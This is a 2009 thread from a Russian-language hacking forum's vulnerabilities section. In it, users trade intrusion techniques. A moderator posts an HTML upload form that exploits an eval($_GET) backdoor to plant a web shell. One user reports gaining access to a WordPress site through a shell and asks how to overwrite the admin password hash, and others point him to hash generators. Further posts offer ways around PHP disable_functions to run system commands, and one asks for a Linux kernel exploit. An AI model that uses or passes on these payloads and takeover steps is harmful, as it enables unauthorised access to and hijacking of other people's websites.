HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.11.2009, 02:09
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
 
Ответить с цитированием

  #2  
Старый 29.11.2009, 10:37
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Nightmarе  
Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
<form action="shell.php?lol=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=./shell.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>
Цитата:
Сообщение от LzD  
[Google Source Code: Поиск багов в исходниках.]
Представлены ссылки для поиска бажного кода.

[1]- GoogleCodeSearch
[2]- GoogleSearch

http://cipher.org.uk/ideas/bugle/

Юзаем , ищем баги, хекоем
В этом проекте и наш ettee участвовал

Последний раз редактировалось Ctacok; 29.11.2009 в 10:39..
 
Ответить с цитированием

  #3  
Старый 29.11.2009, 21:53
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:

$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.

надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
 
Ответить с цитированием

  #4  
Старый 29.11.2009, 22:15
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами: 9431076

Репутация: 229
По умолчанию

Цитата:
Сообщение от YuNi|[c  
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:

$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.

надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
 
Ответить с цитированием

  #5  
Старый 29.11.2009, 22:49
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от nemaniak  
Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
спс уже нашел вот http://onlinefunctions.net/wordpress-hash-generator.html
 
Ответить с цитированием

  #6  
Старый 29.11.2009, 22:44
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от YuNi|[c  
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:

$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.

надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
http://www.insidepro.com/hashes.php?lang=rus --> MD5(Wordpress)
 
Ответить с цитированием

  #7  
Старый 29.11.2009, 22:31
eliteload
Новичок
Регистрация: 22.10.2009
Сообщений: 3
С нами: 8712511

Репутация: 1
Question

disable_functions
Цитата:
rmdir, exec, unlink, shell_exec, escapeshellcmd, system, passthru, pcntl_exec, chmod, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate
возможно ли выполнять системные команды, с такой конфигурацией php.ini? если да, то как?
 
Ответить с цитированием

  #8  
Старый 29.11.2009, 22:41
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Попробуй
PHP код:
<?=`ls`?>
но не факт, т.к. это аналог shell_exec, вроде...

Последний раз редактировалось mailbrush; 29.11.2009 в 22:45..
 
Ответить с цитированием

  #9  
Старый 29.11.2009, 22:44
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от mailbrush  
Попробуй
PHP код:
<?=`ls`?>
но не факт, т.к. это аналог shell_exec, вроде
именно.
Поэтому попробуй заюзать popen.
 
Ответить с цитированием

  #10  
Старый 30.11.2009, 11:23
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Подскажите, может кто-то видел эксплоит на
uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...